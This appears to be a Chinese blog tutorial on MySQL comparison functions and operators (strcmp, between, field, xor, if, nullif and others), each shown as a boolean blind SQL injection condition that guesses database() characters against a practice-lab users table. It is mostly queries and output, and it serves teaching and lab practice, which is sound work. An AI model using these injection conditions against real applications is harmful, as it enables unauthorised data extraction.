2.1、字符比较

发布时间 2023-07-13 17:05:49作者: baiye1

strcmp()

strcmp(str1, str2)
str1 = str2 → 返回 0;
str1 < str2 → 返回 -1;
str1 > str2 → 返回 1;

mysql> select strcmp((substr(database(),1,1)),0x73);
+---------------------------------------+
| strcmp((substr(database(),1,1)),0x73) |
+---------------------------------------+
| 0 |
+---------------------------------------+
1 row in set (0.00 sec)

 

period_diff( str1 , str2 )

# 返回 str1 - str2 的差值;两者相等时返回 0

mysql> select period_diff(ascii((substr(database(),1,1))),0x73);
+---------------------------------------------------+
| period_diff(ascii((substr(database(),1,1))),0x73) |
+---------------------------------------------------+
| 0 |
+---------------------------------------------------+
1 row in set (0.00 sec)

 


TimeDiff( str1 , str2 )

 

# 返回 str1 - str2 的时间差(TIME 类型);两者相等时返回 00:00:00(即 0)

mysql> select timediff(ascii((substr(database(),1,1))),115);
+-----------------------------------------------+
| timediff(ascii((substr(database(),1,1))),115) |
+-----------------------------------------------+
| 00:00:00 |
+-----------------------------------------------+
1 row in set (0.00 sec)

 


FIELD(str0, str1, str2, str3, ...)

 

# 判断 str0 与后续参数中哪一个字符串相等。
# 相等时返回该字符串的位置(下标从 1 开始);未找到则返回 0

mysql> select field('a0','a1','a2','a0');
+----------------------------+
| field('a0','a1','a2','a0') |
+----------------------------+
| 3 |
+----------------------------+
1 row in set (0.00 sec)




  举例用法

mysql> select field(substr(database(),1,1),'s');
+-----------------------------------+
| field(substr(database(),1,1),'s') |
+-----------------------------------+
| 1 |
+-----------------------------------+
1 row in set (0.00 sec)

 

 

like

 

# like 的优先级高于 >、<、=,因此 id=1 like 1 被解析为 id=(1 like 1),相当于 id=1

mysql> select * from users where id=1 like 1;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
| 1 | Dumb | Dumb |
+----+----------+----------+
1 row in set (0.00 sec)

mysql> select * from users where id=1 like 0;
Empty set (0.00 sec)






举例应用

mysql> select * from users where id=1 like (if(substr(database(),1,1)='s',1,0));
+----+----------+----------+
| id | username | password |
+----+----------+----------+
| 1 | Dumb | Dumb |
+----+----------+----------+
1 row in set (0.00 sec)

 


rlike / regexp


BETWEEN ... AND ...

 

# test_str BETWEEN begin_str AND end_str,即 begin_str <= test_str <= end_str(闭区间)

mysql> select '12' between '11' and '31';
+----------------------------+
| '12' between '11' and '31' |
+----------------------------+
| 1 |
+----------------------------+
1 row in set (0.00 sec)

mysql> select 'ac' between 'ab' and 'ce';
+----------------------------+
| 'ac' between 'ab' and 'ce' |
+----------------------------+
| 1 |
+----------------------------+
1 row in set (0.00 sec)





举例用法
mysql> select database() between 's' and 'z';
+--------------------------------+
| database() between 's' and 'z' |
+--------------------------------+
| 1 |
+--------------------------------+
1 row in set (0.00 sec)

select database() between 'a' and 'z'; -- 1
select database() between 'b' and 'z'; -- 1
.........
select database() between 's' and 'z'; -- 1
select database() between 't' and 'z'; -- 0


mysql> select database() between 'sa' and 'sz';
+----------------------------------+
| database() between 'sa' and 'sz' |
+----------------------------------+
| 1 |
+----------------------------------+
1 row in set (0.00 sec)
select database() between 'sa' and 'sz'; -- 1
select database() between 'sb' and 'sz'; -- 1
select database() between 'sc' and 'sz'; -- 1
.........
select database() between 'se' and 'sz'; -- 1
select database() between 'sf' and 'sz'; -- 0

 


IN

mysql> select * from users where id=1 and mid(database(),1,1) in (0x73);
+----+----------+----------+
| id | username | password |
+----+----------+----------+
| 1 | Dumb | Dumb |
+----+----------+----------+
1 row in set (0.00 sec)

mysql> select * from users where id=1 and mid(database(),1,2) in (0x7365);
+----+----------+----------+
| id | username | password |
+----+----------+----------+
| 1 | Dumb | Dumb |
+----+----------+----------+
1 row in set (0.00 sec)

 




AND 配合减法运算

 

#ascii('a') = 97

mysql> select * from users where id=1 and (select ascii('a')-96);
+----+----------+----------+
| id | username | password |
+----+----------+----------+
| 1 | Dumb | Dumb |
+----+----------+----------+
1 row in set (0.00 sec)

mysql> select * from users where id=1 and (select ascii('a')-97);
Empty set (0.00 sec)



注意:= 的优先级高于 AND,因此 select * from users where id=1 and (select ascii('a')-97);
等同于
select * from users where (id=1) and ((select ascii('a')-97)); 本例中无论哪种解析,结果都相同,所以仅凭输出无法区分两者。

 


异或运算 注入

 

# n ^ n = 0; n ^ 0 = n。注意 ^ 的优先级高于减法,下例被解析为 id=((1 ^ length((select database()))) - 8)

mysql> select * from users where id=1 ^ length((select database()))-8;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
| 1 | Dumb | Dumb |
+----+----------+----------+
1 row in set (0.00 sec)

mysql> select * from users where id=1 ^ 0;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
| 1 | Dumb | Dumb |
+----+----------+----------+
1 row in set (0.00 sec)

mysql> select * from users where id=1 xor 0;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
| 1 | Dumb | Dumb |
+----+----------+----------+
1 row in set (0.00 sec)

 

 

or 配合减法运算

 

mysql> select * from users where id=3 or 0;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
| 3 | Dummy | p@ssword |
+----+----------+----------+
1 row in set (0.00 sec)

mysql> select * from users where id=3 or 23;
+----+----------+------------+
| id | username | password |
+----+----------+------------+
| 1 | Dumb | Dumb |
| 2 | Angelina | I-kill-you |
| 3 | Dummy | p@ssword |
| 4 | secure | crappy |
| 5 | stupid | stupidity |
| 6 | superman | genious |
| 7 | batman | mob!le |
| 8 | admin | admin |
| 9 | admin1 | admin1 |
| 10 | admin2 | admin2 |
| 11 | admin3 | admin3 |
| 12 | dhakkan | dumbo |
| 13 | admin4 | admin4 |
| 14 | admin5 | admin5 |
+----+----------+------------+
14 rows in set (0.00 sec)








举例使用

mysql> select * from users where id=3 or ascii(mid(database(),1,1))-115;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
| 3 | Dummy | p@ssword |
+----+----------+----------+
1 row in set (0.00 sec)

mysql> select * from users where id=3 or ascii(mid(database(),1,1))-0x73;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
| 3 | Dummy | p@ssword |
+----+----------+----------+
1 row in set (0.00 sec)

 

 

 


if()

 

mysql> select if(1=1,1,0);
+-------------+
| if(1=1,1,0) |
+-------------+
| 1 |
+-------------+
1 row in set (0.00 sec)

mysql> select if(1=2,1,0);
+-------------+
| if(1=2,1,0) |
+-------------+
| 0 |
+-------------+
1 row in set (0.00 sec)






举例使用

mysql> select * from users where id=3 and if(mid(database(),1,1)='s',1,0);
+----+----------+----------+
| id | username | password |
+----+----------+----------+
| 3 | Dummy | p@ssword |
+----+----------+----------+
1 row in set (0.00 sec)

 

 

ifnull(表达式1,表达式2)

 

# 如果 exp1 为 NULL,则返回 exp2 的值,否则返回 exp1 的值
# 在注入时,关键在于 exp1 的返回值是否为 0(本例中 exp1 是比较结果 1/0,不会为 NULL,因此实际返回的就是 exp1)

mysql> select * from users where id=3 and ifnull(mid(database(),1,1)=0x73,0x20);
+----+----------+----------+
| id | username | password |
+----+----------+----------+
| 3 | Dummy | p@ssword |
+----+----------+----------+
1 row in set (0.00 sec)

mysql> select * from users where id=3 and ifnull(mid(database(),1,1)=0x74,0x20);
Empty set (0.00 sec)
mysql> select * from users where id=3 and ifnull(mid(database(),1,1)=0x78,0x20);
Empty set (0.02 sec)

 


nullif(表达式1,表达式2)

 

# 如果 exp1 = exp2,返回 NULL;如果不相等,返回 exp1 的值
# exp2 的具体取值本身不重要,只要它不等于 exp1 可能返回的值(本例中为 1/0)即可

mysql> select * from users where id=3 and nullif(mid(database(),1,1)='s',2);
+----+----------+----------+
| id | username | password |
+----+----------+----------+
| 3 | Dummy | p@ssword |
+----+----------+----------+
1 row in set (0.00 sec)

mysql> select * from users where id=3 and nullif(mid(database(),1,1)='a',2);
Empty set (0.00 sec)